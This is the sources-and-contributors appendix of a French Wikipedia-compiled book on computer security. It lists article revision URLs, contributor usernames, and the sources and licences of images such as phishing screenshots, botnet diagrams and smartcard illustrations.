Forteresse digitale Source: http://fr.wikipedia.org/w/index.php?oldid=94560292 Contributeurs: Abclf, Adonis, Alain Schneider, Alkarex, Area51Bel, Badmood, Bertol, Dam421, Difool, Djo0012, Dmorphis, EDUCA33E, Ediacara, Elfix, Escaladix, Fobos, Gothmarilyne, Hercule, Itzcoalt, Jef-Infojef, Ji-Elle, Jules78120, Killruana, Kpe189, L'ours, Labbaipierre, Like tears in rain, Litlok, MathsPoetry, Matpib, Mirgolth, MistWiz, Nilruk, Pic-Sou, Scorpius59, Sebastienadam, Shakki, Sophie1908, Speculos, T, Thierry Caro, Thilp, Tieno, Tognopop, Vargenau, Vicomte, WolfyMoon, Zakke, Zclemz, 72 modifications anonymes

Hackers Source: http://fr.wikipedia.org/w/index.php?oldid=94380194 Contributeurs: Arnufle, Badmood, Bap, Brianrelu, Chico75, Colombe7138, Cr0vax, Crash Override, Darkoneko, Deansfa, Ecclecticus, Fourvin, Fredscare, Fu Manchu, Greudin, Gu1ll4um3r0m41n, Guillom, Gz260, HenkvD, JJ, Jesmar, JooooooN, Koyuki, Kropotkine 113, Macfly31, Markadet, Med, Mith, Mythe, Okki, Olyvar, Palsecam, Pok148, Record, Rob8693, Ryo, Schiste, Sebletoulousain, Sharayanan, Sherbrooke, Stottlemeyer, T, Tieno, Vandal, Vlaam, Xinouch, Yopohari, Éric Messel, 30 modifications anonymes

Les Experts Source: http://fr.wikipedia.org/w/index.php?oldid=93813118 Contributeurs: Bargain, Bibi Saint-Pol, Cantons-de-l'Est, Eleanor67, Jules78120, KoS, LPLT, Lomita, Marianne Casamance, Mith, Necrid Master, Nemoi, NonNonNonNon, Phoenix ln, Sherbrooke, Toghebon, 8 modifications anonymes Sources et contributeurs de l’article 480

Matrix Source: http://fr.wikipedia.org/w/index.php?oldid=94878945 Contributeurs: 13Malik88, 16@r, 2A01:E35:8A9D:CC80:C8E4:41BD:FC23:E01E, 2A01:E35:8BCF:4920:5079:9C11:8459:919F, Aadri, Absinthologue, Achraf, Actarus Prince d'Euphor, Addaline, Adrien881, Alchemica, Anonymous89.158.219.153, Apollon, Arkanosis, Artvill, Asavaa, Avoir-alire, Badmood, Baffab, Balougador, Bayo, Benbignon, Benjamin.L, Bibi Saint-Pol, Bloody-libu, Bob08, Boeb'is, Bombyxw, Bouette, Bradipus, Brey180, Briling, Carbidfischer, Carl-9000, Cdang, Celette, Cgeourjon, Chaoborus, Chico75, Chouca, Chricedcisteed, Chtimi44, CommonsDelinker, Coolish, Corentinoger, Counny, Coyau, Coyote du 86, Cr0vax, Cyberugo, Cyril5555, CyrilMC, Céréales Killer, Dadu, Damgreedo, DanRoz, Dark Attsios, David Berardan, Deelight, DeuxDeTension, Diotrax, Djeedjee, DocteurCosmos, Doevell, DonCamillo, Dosto, Edhral, Edouardmazel, Eizekiel, Elfix, Emirix, Emizage, Enzino, Enzoverder, EpicPinguin, Eramat, Esprit Fugace, Fabrice Ferrer, Florebo quocumque ferar, Flot, Fluti, Fm790, Fourvin, François-Dominique, Fylip22, Gabywald, Givet, Gonioul, Gronico, Grook Da Oger, Gvf, Gzen92, HAF 932, Harmonia Amanda, Hashar, Herbythyme, Howard Drake, Hunterpolo, Hypathy, Ico, Irønie, Isacre, JB, JRibaX, Jean tiberghien, Jean-Louis Lascoux, Jean-no, Jean.claude, Jef-Infojef, Jimmy, Jonathaneo, Jsylvain, Kaamelott, Kai Fr, Karoraz, Kelam, Kilianours, Kilith, KoS, Koko90, Koui², Koxinga, Kropotkine 113, Kyro, Kõan, Lacrimosus, Lacrymocéphale, Lacuzon25no, Lamentin, Lasic, Laszlo, Le sotré, Lea(fred), Leila72, Lenaic, Lial25, Lil'Neo, Lionel Allorge, Litlok, Lmaltier, Lomita, M.A.D.company, Malost, Marin M., Markadet, Martin, Maston28, MathsPoetry, Matrix76, Max.R, Mayayu, MeGAmeS1, Mirgolth, Mith, Moez, Monsieur Guerin, Mule hollandaise, Mutatis mutandis, Mythe, Nabeth, Nataraja, NeMeSiS, Neofeld, Neoluna, Neuceu, Neustradamus, Nicolas Ray, Nono64, Nyco, Ollamh, Olmec, Olybrius, Olyvar, Orikrin1998, Orthogaffe, Panoramix, Passoa15, Pazns, Pb.marty, PetitSchtroumpf, Pfv2, Phe, Pidji70, PieRRoMaN, PierreSelim, Piku, Pingui.molotov, Piotron, Poline942, Pontauxchats, Popo le Chien, ProfCalculus, Pso, Pymouss, Rabatakeu, Raphael, Raphaël, Remyv, Rhadamante, Roi du monde, Romanc19s, Rudloff, Ryo, Salade de fruits, Sam Hocevar, Samaty, Sapindnoel, Schnouki, Seb35, Sebjarod, Serge Harvey-Gauthier, Sethickerman, Shakti, Shawn, Sheriff B.D., Simon Villeneuve, Skiff, Smenu, SophieLemarentRoss, Soren56, Speedspid, Star Trek Man, Stellar heaven, Suprememangaka, Sylfred1977, THA-Zp, Tevildo, Thesaurus, Tieno, Tom, Tomsauret, Tonymainaki, Tornad, Totor34400, Traroth, Treehill, Trimégiste, Trinity031, Tum0r, TwoWings, Tyler45, Tyrone, Ulyssangus, Usgloli, VinceChilali, Vincent, Vincent.vaquin, Vinz1789, Vlaam, Waudray, Webmast Gab, Weft, Wikig, Windreaver, Wissen, Wowulu, Yann, YannouLD, Zappy, Zeltrack, ZeroFour, Zertrin, Zetud, 425 modifications anonymes

Traque sur Internet (film) Source: http://fr.wikipedia.org/w/index.php?oldid=94209278 Contributeurs: Asavaa, Ash Crow, Badmood, CHEFALAIN, Coyau, Dhatier, Doubleur, Duet Paris By Night, Huster, Ico, Loris g, Mith, Mro, Neustradamus, Ollamh, Olyvar, Paqpaq94, Pippobuono, Sebleouf, Skarock, Sparks2, Steve43, T, Tieno, Xic667, Zetud, Éric Messel, 18 modifications anonymes

Tron Source: http://fr.wikipedia.org/w/index.php?oldid=93883213 Contributeurs: 78GuiBOSS, Adri1mon, Alastair, Albat', Ancalagon, Aqw96, Arnaud.Serander, Badmood, Barraki, Bibi Saint-Pol, Blidu, CHAUDESAIGUES Xavier, CaptainDangeax, Cdang, Chrysalid, Coyau, Cœur, Dark Attsios, Delhovlyn, Domsau2, Dosto, Dunderklumpen, Elg, Eunostos, FR, Farangoth, Fayd, Floeticsoulchild, Fonzie, Frakir, Frór, Gdgourou, Gonioul, Gotty, Greudin, Guigui668, Guil2027, Gzen92, Helgismidh, Hervée, Hexasoft, Hlm Z., IAlex, IJKL, Ibex:ja, In the laps of the gods, Jaymz Height-Field, Jean Segura, Jeromestoky8, Jesmar, Ji-Elle, Jno972, Johann Grimm, Jpm2112, Jéjé9000, Kilianours, Kleduts, Laius228, Laubrau, LexisVD, Lionel Allorge, Louis-garden, Marin M., Markadet, Mary Ingalls, Megalex II, Mikani, Mike Coppolano, Moez, MortyDeath, Mrfred, Mro, Munk munk, Mythe, Obruaux, Odannur, Ogral, Okki, PROM3TH33, PV250X, Papydenis, Paqpaq94, Pingouin2910, Péris, RRomaric, Rpncy, S Lacombe, Samaty, Schlag vuk, ScriptKidD, Shepperzato, Sherbrooke, Skull33, SniperMaské, Spooky, Superjuju10, Sérénade, TR2N, Tieno, Tron Man, Udufruduhu, Vargenau, Wagner51, ZLade, Zetud, Éric Messel, 106 modifications anonymes

Wargames (film) Source: http://fr.wikipedia.org/w/index.php?oldid=94014860 Contributeurs: Anaconda, ApprentiMiam, Arnaud.Serander, Azoee, Badmood, Bap, Bazook, Bulat, Ced117, Cœur, DanRoz, Depil, Dreoven, Dunderklumpen, FGacquer, Ffx, FitzSai, Fourvin, Framst, Gede, Gene.arboit, Greudin, Guil2027, Hcanon, IP 84.5, Jean-no, JeanDew, Jef-Infojef, Jeremie lefebvre, Jrfcp11, Koko90, L'amateur d'aéroplanes, Lomita, Loonies, Lulu41, MistWiz, Mith, Mro, Nataraja, NicoV, Nodulation, Notafish, Olyvar, Ork, Orthogaffe, Patrick Rogel, Peter17, PetitDej, Phe, RockOrDie666, Salsero35, Shawn, Sherbrooke, Skiff, Speculos, T, THA-Zp, Thierry Caro, Tieno, Urusei, Voxhominis, Walter37, XZombi, Yggdras, ZeroJanvier, Éric Messel, 41 modifications anonymes Source des images, licences et contributeurs 481 Source des images, licences et contributeurs

Fichier:Question book-4.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Question_book-4.svg Licence: GNU Free Documentation License Contributeurs: Tkgd2007 Image:Confidentialité-Intégrité-Disponibilité.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Confidentialité-Intégrité-Disponibilité.png Licence: Creative Commons Attribution-Sharealike 3.0,2.5,2.0,1.0 Contributeurs: Ljean Fichier:Logo securite informatique.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Logo_securite_informatique.png Licence: Public Domain Contributeurs: Romainhk Fichier:ambox globe content.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Ambox_globe_content.svg Licence: Public Domain Contributeurs: penubag Fichier:Disambig colour.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Disambig_colour.svg Licence: Public Domain Contributeurs: Bub's Fichier:Nuvola apps kgpg.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Nuvola_apps_kgpg.png Licence: inconnu Contributeurs: AVRS, Alphax, Bobarino, CyberSkull, Erri4a, It Is Me Here, Rjd0060, Rocket000, Toothy7465 Image:Disambig colour.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Disambig_colour.svg Licence: Public Domain Contributeurs: Bub's Image:Wikipe-tan avatar.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Wikipe-tan_avatar.png Licence: Creative Commons Attribution-Sharealike 2.5 Contributeurs: User:Kasuga and User:Ashibaka Fichier:Recycle002.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Recycle002.svg Licence: GNU Free Documentation License Contributeurs: Marcelo Reis (image), bayo (svg convertion) Fichier:Emblem-important.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Emblem-important.svg Licence: inconnu Contributeurs: The people from the Tango! project Image:Pile_avant_appel.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Pile_avant_appel.png Licence: Public Domain Contributeurs: Original uploader was Ten0k at fr.wikipedia Image:Pile_debordement.gif Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Pile_debordement.gif Licence: Public Domain Contributeurs: Original uploader was Ten0k at fr.wikipedia Fichier:External.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:External.svg Licence: Public Domain Contributeurs: Bayo, Denelson83, FML, Insuranze, Lensovet, Lkopeter, Metalhead64, Rocket000, 2 modifications anonymes Fichier:Man in the middle attack.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Man_in_the_middle_attack.svg Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: Miraceti Image:Asymetric cryptography - step 2.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Asymetric_cryptography_-_step_2.svg Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: odder Fichier:Crypto key.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Crypto_key.png Licence: GNU Lesser General Public License Contributeurs: Original uploader was Dake at fr.wikipedia Later versions were uploaded by Croquant at fr.wikipedia. Image: Nuvola apps kgpg.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Nuvola_apps_kgpg.png Licence: inconnu Contributeurs: AVRS, Alphax, Bobarino, CyberSkull, Erri4a, It Is Me Here, Rjd0060, Rocket000, Toothy7465 Image:Stachledraht DDos Attack.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Stachledraht_DDos_Attack.svg Licence: Creative Commons Attribution-Share Alike Contributeurs: Everaldo Coelho and YellowIcon Fichier:Server-based-network.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Server-based-network.svg Licence: GNU Lesser General Public License Contributeurs: User:Mauro Bieg Image:Blue Screen Phone.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Blue_Screen_Phone.jpg Licence: Public Domain Contributeurs: en:User:Edward Image:Bsod win311.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Bsod_win311.png Licence: Public Domain Contributeurs: Doodledoo, Ecemaml, Fant0men, Nard the Bard, Railwayfan2005 Image:Bsod nt.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Bsod_nt.png Licence: Public Domain Contributeurs: Fant0men, Kephir, Nard the Bard, Railwayfan2005, Rezonansowy Image:Blue Screen.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Blue_Screen.svg Licence: Public Domain Contributeurs: User:Thomas R. Schwarz Fichier:Windows8-BSOD.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Windows8-BSOD.jpg Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: User:Index3510 Image:Fork bomb.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Fork_bomb.svg Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: Dake Image:DES Board300.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:DES_Board300.jpg Licence: GNU Free Documentation License Contributeurs: User:Matt Crypto Fichier:NigerianScam.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:NigerianScam.jpg Licence: Creative Commons Attribution-Sharealike 3.0,2.5,2.0,1.0 Contributeurs: Morburre File:Scam 419 fr.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Scam_419_fr.jpg Licence: Creative Commons Zero Contributeurs: User:DocteurCosmos Image:PhishingTrustedBank.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:PhishingTrustedBank.png Licence: Public Domain Contributeurs: Andrew Levine Fichier:Email account phishing fr.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Email_account_phishing_fr.jpg Licence: Public Domain Contributeurs: Phishing killer Fichier:Cloud computing map.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Cloud_computing_map.png Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: User:Iox59 File:Cloudsecuritymodel.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Cloudsecuritymodel.png Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: User:Iox59 File:Stoned-virus-screenshot.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Stoned-virus-screenshot.jpg Licence: Public Domain Contributeurs: kein Autor, da kein Werk File:Stoned-virus-hexacode.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Stoned-virus-hexacode.jpg Licence: Public Domain Contributeurs: keiner, da kein Werk Fichier:Botnet.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Botnet.svg Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: Tom-b Fichier:Controle d intégrité.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Controle_d_intégrité.png Licence: Creative Commons Attribution-Share Alike Contributeurs: Shiningfm Fichier:Iat hooking.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Iat_hooking.png Licence: Creative Commons Attribution-Share Alike Contributeurs: Shiningfm Fichier:Complexité mot de passe.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Complexité_mot_de_passe.png Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: Shiningfm Image:Nuvola apps ksig horizonta.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Nuvola_apps_ksig_horizonta.png Licence: GNU Lesser General Public License Contributeurs: David Vignoni Fichier:Auth-Forte-b.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Auth-Forte-b.png Licence: Creative Commons Attribution-Sharealike 2.5 Contributeurs: Sylvain Maret Image:Pyramide-auth.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Pyramide-auth.png Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: Sylvain Maret - e-Xpert Solutions Image:Tan-otp.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Tan-otp.png Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: Sylvain Maret Image:Bingo-Card.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Bingo-Card.png Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: Sylvain Maret Image:Sms-otp.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Sms-otp.png Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: Sylvain Maret Image:Clock-Based-OTP.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Clock-Based-OTP.png Licence: Creative Commons Attribution-Sharealike 2.5 Contributeurs: Sylvain Maret Image:Otp-counter.based.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Otp-counter.based.png Licence: Creative Commons Attribution-Sharealike 2.5 Contributeurs: Sylvain Maret Image:OTP-CR.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:OTP-CR.png Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: Smaret Image:moc.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Moc.png Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: Sylvain Maret Source des images, licences et contributeurs 482

Image:Hybride-token.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Hybride-token.png Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: Sylvain Maret Image:Nids.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Nids.png Licence: Public Domain Contributeurs: Sebastien Tricaud Image:Ids hybride.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Ids_hybride.png Licence: Public Domain Contributeurs: Sebastien Tricaud Image:Contremesure.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Contremesure.png Licence: Public Domain Contributeurs: Sebastien Tricaud Image:Firewall (networking).png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Firewall_(networking).png Licence: Public Domain Contributeurs: Luis F. Gonzalez Fichier:Gateway firewall.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Gateway_firewall.png Licence: GNU Free Documentation License Contributeurs: Harald Mühlböck Fichier:DMZ network diagram 1 firewall.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:DMZ_network_diagram_1_firewall.svg Licence: Public domain Contributeurs: en:User:Pbroks13 Image:captcha.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Captcha.jpg Licence: Public Domain Contributeurs: ColderPalace1925, Dbenzhuser, Dewil, Fetchcomms, Fryed-peach, JuTa, Kenmayer, Martin H., Matt314, OsamaK, Pfctdayelise, Poff, Thorjoetunheim, Túrelio, Wst, 8 modifications anonymes Fichier:Modern-captcha.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Modern-captcha.jpg Licence: Public domain Contributeurs: Ariadacapo, Damian Yerrick, JMCC1, Liftarn, Meno25, Sakurambo, Tgr, 4 modifications anonymes Fichier:KCAPTCHA with crowded symbols.gif Source: http://fr.wikipedia.org/w/index.php?title=Fichier:KCAPTCHA_with_crowded_symbols.gif Licence: Public Domain Contributeurs: Original uploader was Kruglov at en.wikipedia Fichier:CAPTCHA wikibook.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:CAPTCHA_wikibook.png Licence: Creative Commons Zero Contributeurs: I-20 Image:Demilitarized Zone Diagram.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Demilitarized_Zone_Diagram.png Licence: Public Domain Contributeurs: Benj Fichier:Crystal_Clear_app_linneighborhood.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Crystal_Clear_app_linneighborhood.png Licence: GNU Lesser General Public License Contributeurs: Everaldo Coelho and YellowIcon Fichier:Crystal mycomputer.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Crystal_mycomputer.png Licence: inconnu Contributeurs: Dake, Rocket000 Fichier:Fireflier.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Fireflier.png Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: codemode Fichier:Personal firewall.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Personal_firewall.png Licence: Free Art License Contributeurs: EugeneZelenko, Harald Mühlböck, Mdd Image:Gtk-dialog-info.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Gtk-dialog-info.svg Licence: GNU Lesser General Public License Contributeurs: David Vignoni Fichier:Crystal kpackage.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Crystal_kpackage.png Licence: inconnu Contributeurs: AVRS, Dake, Nikola Smolenski, Rocket000, 1 modifications anonymes Image: Nuvola apps password.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Nuvola_apps_password.png Licence: GNU Lesser General Public License Contributeurs: Alno, Alphax, Clgblum, Color probe, Rocket000, Svgalbertian, 2 modifications anonymes Image: Nuvola apps emacs.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Nuvola_apps_emacs.png Licence: GNU Lesser General Public License Contributeurs: David Vignoni Image:Chkrootkit en Linux.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Chkrootkit_en_Linux.png Licence: inconnu Contributeurs: Swicher (Mi pagina de usuario) Fichier:ClamAV-sample-summary.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:ClamAV-sample-summary.png Licence: GNU General Public License Contributeurs: AVRS, Denniss, Green Fichier:ESET antivir 7 logo.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:ESET_antivir_7_logo.png Licence: Public Domain Contributeurs: Himanis Das, MainFrame Fichier:Nuvola apps emacs.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Nuvola_apps_emacs.png Licence: GNU Lesser General Public License Contributeurs: David Vignoni Fichier:Pt001.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Pt001.jpg Licence: Creative Commons Attribution-Share Alike Contributeurs: CrezZ Fichier:Gnupg logo.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Gnupg_logo.svg Licence: GNU General Public License Contributeurs: Original uploader was Techietim at en.wikipedia Image:Flag of Germany.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_Germany.svg Licence: Public Domain Contributeurs: User:Madden, User:SKopp Fichier:Netfilter-components.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Netfilter-components.svg Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: Jengelh Fichier:Out of date clock icon.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Out_of_date_clock_icon.svg Licence: GNU Lesser General Public License Contributeurs: Composition by Tkgd2007. I used and modified images from the alternative sources listed below. Fichier:FreeBSD.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:FreeBSD.png Licence: BSD Contributeurs: Victor Fichier:Wikitext.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Wikitext.svg Licence: Public Domain Contributeurs: Anomie Fichier:Netbsd31-screenshot.jpeg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Netbsd31-screenshot.jpeg Licence: BSD Contributeurs: Original uploader was Bojanbozovic at en.wikipedia Fichier:Unix history-simple.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Unix_history-simple.svg Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: Eraserhead1, Infinity0, Sav_vas Fichier:Help-books-aj.svg aj ash 01.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Help-books-aj.svg_aj_ash_01.svg Licence: GNU General Public License Contributeurs: Mads Ren`ai, Schmierer, VIGNERON Fichier:Gnome OpenBSD.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Gnome_OpenBSD.png Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: User:RustyBSD Fichier:IPCop Logo.gif Source: http://fr.wikipedia.org/w/index.php?title=Fichier:IPCop_Logo.gif Licence: GNU General Public License Contributeurs: Tom Eichstaedt Image:Carte vitale anonyme.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Carte_vitale_anonyme.jpg Licence: Public Domain Contributeurs: Greudin Image:CP8_smart_card_-_recto.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:CP8_smart_card_-_recto.png Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: Papardelle Image:Smartcard chip structure and packaging FR.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Smartcard_chip_structure_and_packaging_FR.svg Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: SIM_chip_structure_and_packaging.svg: Justin Ormont derivative work: Zeugma fr (talk) Image:RF-Smartcard.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:RF-Smartcard.svg Licence: Public Domain Contributeurs: Mifare.svg: Swisstack derivative work: Zeugma fr (talk) Image:GSM Micro SIM Card vs. GSM Mini Sim Card - Break Apart.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:GSM_Micro_SIM_Card_vs._GSM_Mini_Sim_Card_-_Break_Apart.svg Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: Justin Ormont Fichier:Carte a puce.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Carte_a_puce.png Licence: Creative Commons Attribution-Sharealike 3.0,2.5,2.0,1.0 Contributeurs: Vlopes File:TPM french.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:TPM_french.svg Licence: GNU Lesser General Public License Contributeurs: Eusebius Fichier:P parthenon.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:P_parthenon.svg Licence: GNU Free Documentation License Contributeurs: Booyabazooka, Pseudomoi Fichier:SecureID token new.JPG Source: http://fr.wikipedia.org/w/index.php?title=Fichier:SecureID_token_new.JPG Licence: Public Domain Contributeurs: Ocrho File:RSA SecurID Token Old.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:RSA_SecurID_Token_Old.jpg Licence: Creative Commons Attribution 3.0 Contributeurs: Alexander Klink File:SecureID token new.JPG Source: http://fr.wikipedia.org/w/index.php?title=Fichier:SecureID_token_new.JPG Licence: Public Domain Contributeurs: Ocrho File:RSA SecurID SID800.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:RSA_SecurID_SID800.jpg Licence: Creative Commons Attribution 3.0 Contributeurs: Alexander Klink Fichier:Lorenz-SZ42-2.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Lorenz-SZ42-2.jpg Licence: Public domain Contributeurs: Avron, Dbenbenn, Sissssou Image:Steganography_original.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Steganography_original.png Licence: GNU Free Documentation License Contributeurs: AnonMoos, Cwbm (commons), 6 modifications anonymes Source des images, licences et contributeurs 483

Image:Steganography_recovered.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Steganography_recovered.png Licence: GNU Free Documentation License Contributeurs: Original uploader was Cyp at en.wikipedia Image:Steganart 2.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Steganart_2.jpg Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: Teumteum Fichier:Eye drawing.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Eye_drawing.svg Licence: inconnu Contributeurs: User:Linuxerist Fichier:Cles symetriques.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Cles_symetriques.png Licence: Public Domain Contributeurs: Roumanet Fichier:Assymetrie - signature vs chiffrement.png Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Assymetrie_-_signature_vs_chiffrement.png Licence: Public Domain Contributeurs: Roumanet Image:Certificat électronique.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Certificat_électronique.svg Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: La Cigale, Pixeltoo Fichier:Certificat_Mail.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Certificat_Mail.jpg Licence: Creative Commons Attribution 3.0 Contributeurs: Roumanet Image:Digital Signature diagram.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Digital_Signature_diagram.svg Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: Acdx Image:Canal_Caché_probabiliste.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Canal_Caché_probabiliste.jpg Licence: Public Domain Contributeurs: Original uploader was Ticho at fr.wikipedia Image:Inputs_bloquants.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Inputs_bloquants.jpg Licence: Public Domain Contributeurs: Original uploader was Ticho at fr.wikipedia Fichier:Orange-book-small.PNG Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Orange-book-small.PNG Licence: Public domain Contributeurs: User:SreeBot Fichier:Flag of Quebec.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_Quebec.svg Licence: Public Domain Contributeurs: DarkEvil Fichier:Flag of Germany.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Flag_of_Germany.svg Licence: Public Domain Contributeurs: User:Madden, User:SKopp Fichier:Collaboration logo.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Collaboration_logo.svg Licence: inconnu Contributeurs: Wikinews_collaboration_logo_2.svg: Masur derivative work: Al Maghi (talk) Fichier:Paris arr jms-298px.gif Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Paris_arr_jms-298px.gif Licence: Creative Commons Attribution-ShareAlike 3.0 Unported Contributeurs: Paris_arr_jms.gif: Original uploader was ThePromenader at en.wikipedia derivative work: Seudo (talk) Fichier:Hémicycle 2 Palais Bourbon scropped and smaller.jpg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:Hémicycle_2_Palais_Bourbon_scropped_and_smaller.jpg Licence: Creative Commons Attribution-Sharealike 3.0 Contributeurs: Alexander Doria, Croquant Image: France Flag Map.svg Source: http://fr.wikipedia.org/w/index.php?title=Fichier:France_Flag_Map.svg Licence: Public Domain Contributeurs: Lokal_Profil 